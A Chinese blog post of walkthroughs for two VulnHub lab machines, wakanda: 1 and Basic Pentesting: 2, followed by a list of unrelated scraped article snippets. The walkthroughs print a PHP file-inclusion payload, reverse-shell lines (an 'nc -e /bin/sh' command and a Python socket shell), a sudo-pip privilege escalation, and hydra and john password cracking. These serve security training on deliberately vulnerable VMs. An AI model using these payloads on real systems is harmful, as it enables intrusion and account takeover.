0x4D75
0x4D75

vulnhub writeup - 持续更新

目录

  • wakanda: 1
    • 0. Description
    • 1. flag1.txt
    • 2. flag2.txt
    • 3. flag3.txt
    • Finished
    • Tips
  • Basic Pentesting: 2
    • 0. Description
    • 1. hydra user
    • 2. john user
    • 3. sudo user
    • Finished
    • Tips

wakanda: 1

download url : https://download.vulnhub.com/wakanda/wakanda-1.ova

0. Description

A new Vibranium market will soon be online in the dark net. Your goal, get your hands on the root file containing the exact location of the mine.

Intermediate level

Flags: There are three flags (flag1.txt, flag2.txt, root.txt)

DHCP: Enabled
IP Address: Automatically assigned
Hint: Follow your intuitions ... and enumerate!

For any questions, feel free to contact me on Twitter: xMagass

Happy Hacking!

初始化环境

下载VirtualBox,直接双击下载好的ova文件,为virtualbox配置DHCP网络,然后开机运行即可。

vulnhub writeup - 持续更新_第1张图片

1. flag1.txt

首先神器nmap扫描整个 192.168.56.0/24 网段。 nmap -sF 192.168.56.0/24

发现主机192.168.56.101开机

然后 nmap -p- -A 192.168.56.101 扫描该主机的所有端口

vulnhub writeup - 持续更新_第2张图片

看到主机开了80、111、514、3333端口。

有80的话,浏览器可以直接打开。

vulnhub writeup - 持续更新_第3张图片

没有太多信息。

页面上英语的意思是:

下一个开放最大的钒市场。 产品直接来自wakanda。 敬请关注!

此时使用dirb爆破主机的目录 dirb http://192.168.56.101/

vulnhub writeup - 持续更新_第4张图片

依次访问以上爆破出来的路径,都没有结果。

只能查看网页源代码了,在其中看到一条隐藏信息。

vulnhub writeup - 持续更新_第5张图片

直接访问这个链接,发现主页面的字改变了

vulnhub writeup - 持续更新_第6张图片

法语,意思是:

下一次开辟最大的铀市场。 产品直接来自wakanda。 请继续关注!

还是不懂

考虑php的 Local File Include (本地文件包含漏洞)。

输入: http://192.168.56.101/?lang=php://filter/convert.base64-encode/resource=index

发现页面有变化:

查看源代码:

vulnhub writeup - 持续更新_第7张图片

将以上字符串复制下来,明显是base64编码后的,先base64解码,得到:

vulnhub writeup - 持续更新_第8张图片

可以看到 $password ="Niamey4Ever227!!!" ,因为扫描的时候发现3333端口是ssh服务,这里猜测这个密码是ssh的密码,但是测试发现用户名不是root,查看页面发现关键信息:

用 mamadou / Niamey4Ever227!!! 登陆ssh,成功。

vulnhub writeup - 持续更新_第9张图片

看到这是一个Python的终端,不方便执行命令,所以使用 python -c ‘import pty; pty.spawn(“/bin/sh”)’ 将其转换为shell

vulnhub writeup - 持续更新_第10张图片

这里就得到了第一个flag:

vulnhub writeup - 持续更新_第11张图片

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

2. flag2.txt

查看 /etc/passwd 文件,发现还有另外一个用户,并且其家目录中有flag2

vulnhub writeup - 持续更新_第12张图片

但是当前的shell没有查看的权限。

查找devops用户的相关文件:

vulnhub writeup - 持续更新_第13张图片

看到 .antivirus.py 的内容是打开/tmp/test 写入test

这里向其中写入反弹shell的命令 os.system('nc -e /bin/sh 127.0.0.1 4444') 并另开一个终端进行监听

等了一会发现主机上已经收到shell

这样就可以看flag2.txt

vulnhub writeup - 持续更新_第14张图片

思路就是查看 test的mtime , 用 stat /tmp/test 可以看到,test在近5分钟内修改过,所以推测有定时任务在执行该py脚本。

vulnhub writeup - 持续更新_第15张图片

获取到devops的shell后,查找.antivirus.py可以发现,每300秒,脚本就会执行一次。

grep -Ril .antivirus.py / 2>/dev/null
/lib/systemd/system/antivirus.service

mamadou@Wakanda1:/etc$ grep -Ril .antivirus.py / 2>/dev/null
/lib/systemd/system/antivirus.service
mamadou@Wakanda1:/etc$ cat /lib/systemd/system/antivirus.service 
[Unit]
Description=Antivirus
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=300 
User=devops
ExecStart=/usr/bin/env python /srv/.antivirus.py

[Install]
WantedBy=multi-user.target

3. flag3.txt

输入 sudo -l

vulnhub writeup - 持续更新_第16张图片

看到可以以root权限运行pip 。google找到开源项目 https://github.com/0x00-0x00/FakePip 可以直接利用。

下载其中的setup.py 脚本,修改setup.py中的host为127.0.0.1 port为4433并执行。

首先新开一个终端 输入nc -lnvp 4433

然后在刚刚反弹得到的shell执行:sudo /usr/bin/pip install . --upgrade --force-reinstall

看到另一个正在监听的终端已经捕获到反弹出的shell,root权限:

vulnhub writeup - 持续更新_第17张图片

这样就得到了最后一个flag

vulnhub writeup - 持续更新_第18张图片

Finished

Tips

本次学到的主要内容:

  • php文件包含 https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf
  • 终端 python -c ‘import pty; pty.spawn(“/bin/sh”)’
  • 反弹shell import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
  • sudo -l (https://github.com/0x00-0x00/FakePip)
  • ...

Basic Pentesting: 2

Download url : https://www.vulnhub.com/entry/basic-pentesting-2,241/

0. Description

This is a boot2root VM and is a continuation of the Basic Pentesting series. This series is designed to help newcomers to penetration testing develop pentesting skills and have fun exploring part of the offensive side of security.

VirtualBox is the recommended platform for this challenge (though it should also work with VMware -- however, I haven’t tested that).

This VM is a moderate step up in difficulty from the first entry in this series. If you’ve solved the first entry and have tried a few other beginner-oriented challenges, this VM should be a good next step. Once again, this challenge contains multiple initial exploitation vectors and privilege escalation vulnerabilities.

Your goal is to remotely attack the VM, gain root privileges, and read the flag located at /root/flag.txt. Once you’ve finished, try to find other vectors you might have missed! If you’d like to send me a link to your writeup, enjoyed the VM or have questions or feedback, feel free to contact me at: [email protected]

If you finished the VM, please also consider posting a writeup! Writeups help you internalize what you worked on and help anyone else who might be struggling or wants to see someone else’s process. There were lots of wonderful writeups for Basic Pentesting: 1, and I look forward to reading the writeups for this challenge.

初始化环境

下载VirtualBox,直接双击下载好的ova文件,为virtualbox配置DHCP网络,然后开机运行即可。

1. hydra user

首先nmap扫描整个网段: nmap -sF 192.168.56.0/24 , 发现存活主机 192.168.56.101

然后扫描端口: nmap -A 192.168.56.101

vulnhub writeup - 持续更新_第19张图片

发现主机 22 / 80 / 139 / 445 / 514 / 8009 / 8080 端口开启

浏览器访问80端口, 无有用信息

dirb爆破目录信息: dirb http://192.168.56.101 , 看到:

vulnhub writeup - 持续更新_第20张图片

然后访问 : http://192.168.56.101/development/ , 看到:

vulnhub writeup - 持续更新_第21张图片

里面的内容是两封邮件,内容分别为:

vulnhub writeup - 持续更新_第22张图片

vulnhub writeup - 持续更新_第23张图片

这里看到,KJ 发消息说,J 的口令为弱密码,让他整改,所以考虑爆破。但是并不知道 K 和 J 的真正用户名。

然后由于 nmap 扫描时看到主机开放了139 445 端口,并且有 SMB 服务,所以尝试用kali的 enum4linux 探测主机的用户名。

enum4linux 192.168.56.101

vulnhub writeup - 持续更新_第24张图片

看到 K 和 J 其实分别是 kayjan

然后用hydra爆破 jan 的密码:

vulnhub writeup - 持续更新_第25张图片

成功,得到 jan 的密码 : armando

接下来,ssh 登陆 jan 用户。

2. john user

vulnhub writeup - 持续更新_第26张图片

成功登陆了 jan 用户

最终目的是登陆root用户,没什么思路,看一下 kay 用户的家目录,发现了一个 pass.bak 和 ssh 公私钥

vulnhub writeup - 持续更新_第27张图片

所以接下来的思路就是 ssh 登陆 kay 用户,然后查看pass.bak的内容。

这里需要了解公私钥的知识。

这里我们将 id_rsa 这个私钥拷贝下来,复制到kali 上, 用john这个工具爆破 kay 的 密码。

首先用 ssh2john 将id_rsa 转换为可以爆破的 hash 类型,名字为 key , 然后 john key 爆破:

vulnhub writeup - 持续更新_第28张图片

得到 kay 的密码 beeswax

直接 ssh 登陆即可

3. sudo user

vulnhub writeup - 持续更新_第29张图片

这样就登陆了 kay 账户,看到 pass.bak 的内容貌似是一个强密码

这里有一点需要注意的是:id_rsa的权限要600或700才能登陆,否则会报错 ( chmod 600 id_rsa)

尝试一下切换 root , 输入该密码,发现成功了,然后再 /root下找到了 flag.txt

vulnhub writeup - 持续更新_第30张图片

Finished

Tips

  • ssh 公私钥
  • ssh2jhon 和 jhon 的用法
  • enum4linux 用法

你可能感兴趣的:(vulnhub writeup - 持续更新)

  • 【笔试题汇总】华为春招笔试题题解 2024-3-20 PXM的算法星球 大厂面试题华为面试数据结构算法
    这里是paoxiaomo,一个现役ACMer,之后将会持续更新算法笔记系列以及笔试题题解系列本文章面向想打ICPC/蓝桥杯/天梯赛等程序设计竞赛,以及各个大厂笔试的选手感谢大家的订阅➕和喜欢有什么想看的算法专题可以私信博主(本文题面由清隆学长收集)01.K小姐的魔法药水问题描述K小姐是一位魔法师,她最近在研究一种神奇的魔法药水。这种药水由一系列魔法材料制成,每种材料都有一个正整数的魔法值。K小姐按
  • python提取数据库数据到前端html5显示_python html提取数据库数据 weixin_39878745
    python开源工具列表【持续更新】以下是个人在工作中整理的一些pythonwheel,供参考。这个列表包含与网页抓取和数据处理的Python库网络通用urllib-网络库(stdlib)。requests-网络库。grab–网络库(基于pycurl)。pycurl–网络库(绑定libcurl)。urllib3–...文章武耀文2018-04-253128浏览量8个用于业余项目的优秀Python库
  • 构建数据恢复的坚实防线:MySQL数据恢复策略的文档化实践 liuxin33445566 mysql数据库
    数据恢复策略的文档化是确保企业在面临数据丢失或损坏时能够迅速、有效地恢复数据的关键步骤。在MySQL数据库环境中,这一过程尤为重要,因为良好的文档化不仅有助于规范恢复流程,还能提高团队的响应速度和恢复成功率。本文将详细探讨如何在MySQL中实现数据恢复策略的文档化,包括策略规划、文档编写、存储管理以及持续更新等方面。1.引言在当今的数字化时代,数据的价值日益凸显,数据丢失或损坏可能给企业带来巨大的
  • 前端面试题(附答案)持续更新中…… 卖家导航 程序员前端
    块标签:div、h1~h6、ul、li、table、p、br、form。特征:独占一行,换行显示,可以设置宽高,可以嵌套块和行行标签:span、a、img、textarea、select、option、input。特征:只有在行内显示,内容撑开宽、高,不可以设置宽、高(img、input、textarea等除外)。5.清除浮动⭐⭐⭐父级div定义overflow:hidden结尾处加空div标签c
  • 鸿蒙内核解析,鸿蒙内核源码分析(内存概念篇)|解读鸿蒙源码 刘轩鸿 鸿蒙内核解析
    提示:本文基于开源鸿蒙内核分析,官方源码【kernel_liteos_a】官方文档【docs】参考文档【HuaweiLiteOS】本文作者:鸿蒙内核发烧友,用生活场景讲故事的方式去解构内核,一窥究竟,让神秘的内核栩栩如生,浮现眼前。博文全部原创,持续更新,敬请关注。内容仅代表个人观点,错误之处,欢迎大家指正完善。本系列全部文章进入鸿蒙源码分析(总目录)查看目录最难讲的章节坦白讲内存是整个系列里面最
  • vulnhub靶机-DC2-Writeup 含日 靶机linux安全靶机渗透测试安全漏洞
    0x01部署靶机地址:https://www.vulnhub.com/entry/dc-2,311/DESCRIPTIONMuchlikeDC-1,DC-2isanotherpurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.AswiththeoriginalDC-1,i
  • VulnHub DC-1-DC-7靶机WP 蚁景网络安全 网络安全渗透测试
    VulnHubDC系列靶机:https://vulnhub.com/series/dc,199/#VulnHubDC-1nmap开路获取信息Nmapscanreportfor192.168.106.133Hostisup(0.00017slatency).Notshown:997closedportsPORTSTATESERVICE22/tcpopenssh80/tcpopenhttp111/tc
  • 团聚是最好的旅行 一言伟定
    国庆假期临近之际,大家都在盘算、构思着自己的出行计划,就连最近的朋友圈里也是花样式的旅游出行秀,从不间断而又大体相似的持续更新,一边有意无意的告知他人出行旅游了,一边充斥着种种有关拥堵的抱怨,仿佛抱怨越深,越能证明自己不想出行而又不得不出行的苦衷……放假的前一天,也有好友寒暄式的问我国庆到哪旅游,我说“带着妻儿回老家乡村游”。朋友哈哈大笑,我清楚他的笑声一定是认为我在自我调侃,故作幽默!素不知,这
  • llama_index 官方文档阅读笔记 (持续更新版) 皮卡丘ZPC AIGCforGPT评分体系构架笔记llama人工智能语言模型
    llama0.10.17版本阅读链接:LlamaIndexv0.10.17LlamaIndex是一个基于LLM的应用程序的数据框架,它受益于上下文增强。这种LLM系统被称为RAG系统,代表“检索-增强生成”。LlamaIndex提供了必要的抽象,以便更轻松地摄取、构建和访问私有或特定于域的数据,以便将这些数据安全可靠地注入LLM,以实现更准确的文本生成。为什么选择上下文增强?LLM的局限LLM在人
  • 2024最新微信红包封面序列号大全+领取时间表(持续更新) 全网优惠分享
    每天,我们都在奔波于现实的雾霾里。工作、生活、压力、困扰,如同无尽的泥潭,让我们时刻感到疲惫不堪。然而,在这个被喧嚣包围的世界,我们是否还能保持内心的宁静和平淡?微.信搜索:「封面院」关注公众号可领取红包封面序列号。最新微信红包封面序列号:先到先得,抢完为止:1、pdiqgLsY1lR2、vC8tY0VRf3D3、j0kzzrfwl6Y4、dqRCUZ0lwmJ5、ldT1AnvLljQ6、h0i
  • Django5+Vue3:OA系统前后端分离项目实战-后端登录功能实现(7) Fender的web学习路程 Django5+Vue3pythondjangovueweb
    Django5+Vue3系列文章前言本节开始,全文仅对会员开放。若点赞和收藏数量超过100,全文将免费开放。此项目采用Django框架的5.0.7版本进行开发。Django5.0支持的Python版本为3.10、3.11和3.12。OA系统系列文章将持续更新,直至项目的Docker部署阶段。专栏链接:~快捷传送门:留个赞再走呗!~个人博客:~所有文章尽在简客免费阅读~文章目录目录Django5+V
  • python调用微信自带OCR实现内容识别(全) knighthood2001 python调用微信本地OCR进行文字识别python微信ocr
    博客主页:knighthood2001✨公众号:认知up吧(目前正在带领大家一起提升认知,感兴趣可以来围观一下)知识星球:【认知up吧|成长|副业】介绍❤️感谢大家点赞收藏⭐评论✍,您的三连就是我持续更新的动力❤️笔者水平有限,欢迎各位大佬指点,相互学习进步!今天就让我们来实现一下python调用微信自带OCR进行文本识别。要实现这个功能,你需要看看之前写的这两篇文章:01:py
  • Pointnet++改进即插即用系列:全网首发DilatedReparamBlock |即插即用,提升特征提取模块性能 AICurator Pointnet++改进专栏python深度学习pytorch
    简介:1.该教程提供大量的首发改进的方式,降低上手难度,多种结构改进,助力寻找创新点!2.本篇文章对Pointnet++特征提取模块进行改进,加入DilatedReparamBlock,提升性能。3.专栏持续更新,紧随最新的研究内容。目录1.理论介绍2.修改步骤2.1步骤一2.2步骤二2.3步骤三1.理论介绍近年来,大核卷积神经网络(ConvNets)得到了广泛的研究关注,但有两个尚未解决的关键问
  • django遇到的一些问题(持续更新大概) Java and python pythonDjango
    先放图原因常出现的Connection reset by peer: 原因大概有以下几点:1.服务器的并发连接数超过了其承载量,服务器会将其中一些连接Down掉2.客户关掉了浏览器,服务端还在给客户端发送数据3.浏览器端按了stop通常是因为远程主机上的对等应用程序突然停止运行,或者远程主机重新启动,或者远程主机使用“强制”关闭(在远程套接字上看到SETSOCKOPT(SOOLIGER))。此外,
  • Django中遇到的问题(持续更新) Hi,你好啊 Pythondjangopython后端
    问题一:url导入不成功导入:fromdjango.conf.urlsimporturl报错:ImportError:cannotimportname'url'from'django.conf.urls'原因:Django在4.0以上版本将其废弃。解决办法:#使用新的函数进行替代fromdjango.urlsimportre_pathasurl
  • AOSP、AOKP、CM的区别 weixin_30617797
    无刷机,不Android。相信大多数机友选择Android手机都看中其高定制性和可玩性,Android系统历经五年的持续更新,流畅性和系统功能愈加完善,除了众多发烧友喜爱的原生Android系统外,HTCSense、三星Touwiz和小米MIUI等定制UI都以优质的用户体验和人性化操作界面,培养了属于自己的粉丝。当然,除了这些手机厂商赖以生存的Officialrom,还存在许多由ROM开发者编译的
  • Python -- GUI图形界面编程—GUI编程实例 博主也在持续学习中[ 持续更新中!!! 欢迎白嫖 也求粉啊啊啊~ ] 梦茹^_^ Python_GUI编程python开发语言GUI经验分享前端框架前端组件
    本文继上篇文章http://t.csdnimg.cn/rrsIL继续介绍GUI的图形界面编程(相关视频是哔站上的应该搜这个题目就能找到),文章还是很基础的,目前博主处于有一点基础的状态。文章的主要介绍了依旧非常重要的结构tinkter库、重要组件简介(这个不用死记硬背用的时候再说)、Text(多行文本框)、Radiobutton、Checkbutton、Canvas画布,依旧是很多代码部分是重复的
  • 2024年最新iOS 语言基础&;初探 Xcode 工具_xcode 入门(1),BAT这种大厂履历意味着什么 2401_84830208 程序员go学习面试
    既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新如果你需要这些资料,可以戳这里获取Xcode工程体系Xcode工具简介首先我会介绍主要的开发工具Xcode以及它的工程体系。接着是介绍obj
  • 2024国赛数学建模保姆级选题建议,思路教程 灿灿数模分号 数学建模
    2024年高教社杯全国大学生数学建模竞赛题目分析,思路模型代码论文持续更新,更新见文末名片A题:“板凳龙”闹元宵难度:中等偏上适合专业:工程力学、机械工程、物理、计算机科学、数学等专业的学生适合解答这一题。特别是有扎实几何建模、力学和动态模拟基础的学生。主要算法和模型:1.几何建模:需要建立空间几何模型,可以用螺旋线方程、空间曲线运动方程来描述舞龙队的位置和速度。2.动力学模拟:可以使用微分方程或
  • 2024 年高教社杯全国大学生数学建模竞赛 C 题 农作物的种植策略 参考论文 无水印 布凯彻-劳斯基 数学建模c语言开发语言论文笔记学习
    持续更新中,2024年数学建模比赛思路代码论文都会发布到专栏内,只需订阅一次!完整论文+代码+数据结果链接在文末!订阅后可查看参考论文文件第一问1.1问题重述这个问题围绕的是华北山区的某乡村,在有限的耕地条件下,如何制定最优的农作物种植策略。乡村有34块露天耕地和20个大棚,种植条件包括粮食作物、蔬菜、水稻和食用菌。除了要考虑地块的面积、种植季节等,还要确保三年内每块地至少种植一次豆类作物。根据附
  • 2024 年高教社杯全国大学生数学建模竞赛 C 题 农作物的种植策略(完整代码) 布凯彻-劳斯基 数学建模开发语言python学习论文阅读
    持续更新中,2024年数学建模比赛思路代码论文都会发布到专栏内,只需订阅一次!完整论文+代码+数据结果链接在文末!第一问代码:(1)importpandasaspdimportnumpyasnpfromscipy.optimizeimportlinprogimportrandom#读取四个表格的数据file_1='2023年的种植数据与销售量.xlsx'file_2='各作物聚合后销售量与价格.x
  • 2024最新前端面试真题-超详细答题思路解析(持续更新ing) 我的E样人生 前端面试职场和发展
    为了更加高效的准备面试,所以面试题都来源于牛客网真题,让面试题更符合实际。1cookie,sessionStorage,localStorage的区别(1)考察点分析存储机制:了解每种存储方式的实现原理和数据存储方式。生命周期:掌握每种存储方式的数据存储时长和生命周期管理。作用域:理解每种存储方式的数据访问范围和作用域限制。(2)最终答案Cookie:存储机制:以文本形式存储在客户端浏览器中,通过
  • 2023ICPC济南站训练补题 farawaytravelerchy ACM-ICPC训练补题算法python
    title:2023ICPC济南站VP补题记录(第48届)date:2024-01-1812:16:23mathjax:truetags:XCPCcategories:Algorithm文章目录2023ICPC济南站训练补题注:暂时更新vp时ac的4道题,其余题目之后持续更新[Problem-D-LargestDigit](https://codeforces.com/gym/104901/pro
  • 【2024国赛A题】高教社杯全国大学生数学建模竞赛A题思路和参考代码 Matlab领域 数学建模
    欢迎来到本博客❤️❤️博主优势:精通Matlab各领域,且各项目代码较全,可供指导交流。⛳️座右铭:行百里者,半于九十。⛄一、思路与参考代码点击下方,即可订阅专栏2024年高教社杯全国大学生数学建模竞赛(国赛)1:订阅此专栏,即可见解题思路+参考代码+参考论文+一次付费+持续更新!2:订阅此专栏,即可获得以下专栏(初级版)任意代码一份。扫描文章底部QQ名片,提供订阅记录,备注所需代码期号和国赛;
  • 2024 年高教社杯全国大学生数学建模竞赛 E 题 交通流量管控 详细思路+matlab代码+python代码+论文范例 2024年数学建模国赛 备战2024数学建模国赛2024数学建模(不代写论文请勿盲目订阅)数学建模2024数学建模国赛2024数学建模国赛E题2024高教社杯
    持续更新中,2024年所有数学建模比赛思路代码都会发布到专栏内,只需要订阅一次。5号6号半价,会结合历年优秀论文、人工智能深度学习算法、chatgpt。会定期发布思路、代码和论文。思路和论文基本拿不到国奖,想要获得国奖的同学不要购买。适合基础差的学生,容易获得省奖!随着城市化进程的加快、机动车的快速普及,以及人们活动范围的不断扩大,城市道路交通拥堵问题日渐严重,即使在一些非中心城市,道路交通拥堵问
  • 基于开源CrashRpt与微软开源Detours技术深度改造的异常捕获库分享 dvlinker C/C++实战专栏异常捕获开源异常捕获库CrashRptCrashPaddump文件Windbg
    目录1、异常捕获模块概述2、为什么需要异常捕获模块?3、在有些异常的场景下是没有生成dump文件的4、开源异常捕获库CrashRpt介绍5、对开源库CrashRpt的改进C++软件异常排查从入门到精通系列教程(专栏文章列表,欢迎订阅,持续更新...)https://blog.csdn.net/chenlycly/article/details/125529931
  • mysql 函数编程大全(持续更新) weixin_34014555 数据库网络人工智能
    insertignoreinsertignore表示,如果中已经存在相同的记录,则忽略当前新数据如果您使用一个例如“SETcol_name=col_name+1”的赋值,则对位于右侧的列名称的引用会被作为DEFAULT(col_name)处理。因此,该赋值相当于SETcol_name=DEFAULT(col_name)+1。MySQL的CAST()和CONVERT()函数可用来获取一个类型的值,并
  • 华为OD机试Python - 计算三叉搜索树的高度 steven_my 华为OD机试Python华为odpythonc++javajavascript华为OD机试算法
    计算三叉搜索树的高度前言:本专栏将持续更新互联网大厂机试真题,并进行详细的分析与解答,包含完整的代码实现,希望可以帮助到正在努力的你。关于大厂机试流程、面经、面试指导等,如有任何疑问,欢迎联系我,wechat:steven_moda;email:[email protected];备注:CSDN。题目描述定义构造三叉搜索树规则如下:每个节点都存有一个数,当插入一个新的数时,从根节点向下寻找,直到
  • 华为OD机试 - 计算三叉搜索树的高度(Python、Java、C++、Javascript) steven_moyu 华为OD机试(Py&Java&C++&Js)华为odpythonjavajavascriptc++华为OD机试算法
    计算三叉搜索树的高度前言:本专栏将持续更新互联网大厂机试真题,并进行详细的分析与解答,包含完整的代码实现,希望可以帮助到正在努力的你。关于大厂机试流程、面经、面试指导等,如有任何疑问,欢迎联系我,wechat:steven_moda;email:[email protected];备注:CSDN。题目描述定义构造三叉搜索树规则如下:每个节点都存有一个数,当插入一个新的数时,从根节点向下寻找,直到
  • 无人机民航执照、多旋翼、固定翼视距内驾驶员、机长考证试题 无人机--胜哥 无人机组装与调试
    无人机执照考试、无人机考证考试题库(1000题,解析+答案)持续更新中501.和地面建筑物有关的湍流强度依赖于______,这会影响任何飞机的起飞和着陆性能,也会引发非常严重的危险。A.障碍物的多少和风的基本速度B.障碍物的大小和风的基本方向C.障碍物的大小和风的基本速度答案:C.502.雷暴是由强烈的积雨云产生的,形成强烈的积雨云需要三个条件:______A.深厚而明显的不稳定气层、剧烈的温差、
  • jQuery 跨域访问的三种方式 No 'Access-Control-Allow-Origin' header is present on the reque qiaolevip 每天进步一点点学习永无止境跨域众观千象
    XMLHttpRequest cannot load http://v.xxx.com. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost:63342' is therefore not allowed access. test.html:1
  • mysql 分区查询优化 annan211 java分区优化mysql
    分区查询优化 引入分区可以给查询带来一定的优势,但同时也会引入一些bug. 分区最大的优点就是优化器可以根据分区函数来过滤掉一些分区,通过分区过滤可以让查询扫描更少的数据。 所以,对于访问分区表来说,很重要的一点是要在where 条件中带入分区,让优化器过滤掉无需访问的分区。 可以通过查看explain执行计划,是否携带 partitions
  • MYSQL存储过程中使用游标 chicony Mysql存储过程
    DELIMITER $$ DROP PROCEDURE IF EXISTS getUserInfo $$ CREATE PROCEDURE getUserInfo(in date_day datetime)-- -- 实例-- 存储过程名为:getUserInfo-- 参数为:date_day日期格式:2008-03-08--    BEGINdecla
  • mysql 和 sqlite 区别 Array_06 sqlite
    转载: http://www.cnblogs.com/ygm900/p/3460663.html mysql 和 sqlite 区别 SQLITE是单机数据库。功能简约,小型化,追求最大磁盘效率 MYSQL是完善的服务器数据库。功能全面,综合化,追求最大并发效率 MYSQL、Sybase、Oracle等这些都是试用于服务器数据量大功能多需要安装,例如网站访问量比较大的。而sq
  • pinyin4j使用 oloz pinyin4j
    首先需要pinyin4j的jar包支持;jar包已上传至附件内 方法一:把汉字转换为拼音;例如:编程转换后则为biancheng      /** * 将汉字转换为全拼 * @param src 你的需要转换的汉字 * @param isUPPERCASE 是否转换为大写的拼音; true:转换为大写;fal
  • 微博发送私信 随意而生 微博
    在前面文章中说了如和获取登陆时候所需要的cookie,现在只要拿到最后登陆所需要的cookie,然后抓包分析一下微博私信发送界面 http://weibo.com/message/history?uid=****&name=**** 可以发现其发送提交的Post请求和其中的数据, 让后用程序模拟发送POST请求中的数据,带着cookie发送到私信的接入口,就可以实现发私信的功能了。
  • jsp 香水浓 jsp
    JSP初始化     容器载入JSP文件后,它会在为请求提供任何服务前调用jspInit()方法。如果您需要执行自定义的JSP初始化任务,复写jspInit()方法就行了 JSP执行     这一阶段描述了JSP生命周期中一切与请求相关的交互行为,直到被销毁。     当JSP网页完成初始化后
  • 在 Windows 上安装 SVN Subversion 服务端 AdyZhang SVN
    在 Windows 上安装 SVN Subversion 服务端2009-09-16高宏伟哈尔滨市道里区通达街291号   最佳阅读效果请访问原地址:http://blog.donews.com/dukejoe/archive/2009/09/16/1560917.aspx   现在的Subversion已经足够稳定,而且已经进入了它的黄金时段。我们看到大量的项目都在使
  • android开发中如何使用 alertDialog从listView中删除数据? aijuans android
    我现在使用listView展示了很多的配置信息,我现在想在点击其中一条的时候填出 alertDialog,点击确认后就删除该条数据,( ArrayAdapter ,ArrayList,listView 全部删除),我知道在 下面的onItemLongClick 方法中 参数 arg2  是选中的序号,但是我不知道如何继续处理下去 1 2 3
  • jdk-6u26-linux-x64.bin 安装 baalwolf linux
    1.上传安装文件(jdk-6u26-linux-x64.bin) 2.修改权限 [root@localhost ~]# ls -l /usr/local/jdk-6u26-linux-x64.bin 3.执行安装文件 [root@localhost ~]# cd /usr/local [root@localhost local]# ./jdk-6u26-linux-x64.bin&nbs
  • MongoDB经典面试题集锦 BigBird2012 mongodb
    1.什么是NoSQL数据库?NoSQL和RDBMS有什么区别?在哪些情况下使用和不使用NoSQL数据库? NoSQL是非关系型数据库,NoSQL = Not Only SQL。 关系型数据库采用的结构化的数据,NoSQL采用的是键值对的方式存储数据。 在处理非结构化/半结构化的大数据时;在水平方向上进行扩展时;随时应对动态增加的数据项时可以优先考虑使用NoSQL数据库。 在考虑数据库的成熟
  • JavaScript异步编程Promise模式的6个特性 bijian1013 JavaScriptPromise
            Promise是一个非常有价值的构造器,能够帮助你避免使用镶套匿名方法,而使用更具有可读性的方式组装异步代码。这里我们将介绍6个最简单的特性。         在我们开始正式介绍之前,我们想看看Javascript Promise的样子: var p = new Promise(function(r
  • [Zookeeper学习笔记之八]Zookeeper源代码分析之Zookeeper.ZKWatchManager bit1129 zookeeper
    ClientWatchManager接口 //接口的唯一方法materialize用于确定那些Watcher需要被通知 //确定Watcher需要三方面的因素1.事件状态 2.事件类型 3.znode的path public interface ClientWatchManager { /** * Return a set of watchers that should
  • 【Scala十五】Scala核心九:隐式转换之二 bit1129 scala
    隐式转换存在的必要性,   在Java Swing中,按钮点击事件的处理,转换为Scala的的写法如下:   val button = new JButton button.addActionListener( new ActionListener { def actionPerformed(event: ActionEvent) {
  • Android JSON数据的解析与封装小Demo ronin47
    转自:http://www.open-open.com/lib/view/open1420529336406.html package com.example.jsondemo; import org.json.JSONArray; import org.json.JSONException; import org.json.JSONObject;    impor
  • [设计]字体创意设计方法谈 brotherlamp UIui自学ui视频ui教程ui资料
      从古至今,文字在我们的生活中是必不可少的事物,我们不能想象没有文字的世界将会是怎样。在平面设计中,UI设计师在文字上所花的心思和功夫最多,因为文字能直观地表达UI设计师所的意念。在文字上的创造设计,直接反映出平面作品的主题。 如设计一幅戴尔笔记本电脑的广告海报,假设海报上没有出现“戴尔”两个文字,即使放上所有戴尔笔记本电脑的图片都不能让人们得知这些电脑是什么品牌。只要写上“戴尔笔
  • 单调队列-用一个长度为k的窗在整数数列上移动,求窗里面所包含的数的最大值 bylijinnan java算法面试题
    import java.util.LinkedList; /* 单调队列 滑动窗口 单调队列是这样的一个队列:队列里面的元素是有序的,是递增或者递减 题目:给定一个长度为N的整数数列a(i),i=0,1,...,N-1和窗长度k. 要求:f(i) = max{a(i-k+1),a(i-k+2),..., a(i)},i = 0,1,...,N-1 问题的另一种描述就
  • struts2处理一个form多个submit chiangfai struts2
    web应用中,为完成不同工作,一个jsp的form标签可能有多个submit。如下代码: <s:form action="submit" method="post" namespace="/my"> <s:textfield name="msg" label="叙述:">
  • shell查找上个月,陷阱及野路子 chenchao051 shell
    date -d "-1 month" +%F     以上这段代码,假如在2012/10/31执行,结果并不会出现你预计的9月份,而是会出现八月份,原因是10月份有31天,9月份30天,所以-1 month在10月份看来要减去31天,所以直接到了8月31日这天,这不靠谱。     野路子解决:假设当天日期大于15号
  • mysql导出数据中文乱码问题 daizj mysql中文乱码导数据
    解决mysql导入导出数据乱码问题方法: 1、进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+----------------------------------------+ | Variable_name&nbs
  • SAE部署Smarty出现:Uncaught exception 'SmartyException' with message 'unable to write dcj3sjt126com PHPsmartysae
      对于SAE出现的问题:Uncaught exception 'SmartyException' with message 'unable to write file...。 官方给出了详细的FAQ:http://sae.sina.com.cn/?m=faqs&catId=11#show_213 解决方案为:   01 $path 
  • 《教父》系列台词 dcj3sjt126com
    Your love is also your weak point. 你的所爱同时也是你的弱点。   If anything in this life is certain, if history has taught us anything, it is that you can kill anyone.   不顾家的人永远不可能成为一个真正的男人。 &
  • mongodb安装与使用 dyy_gusi mongo
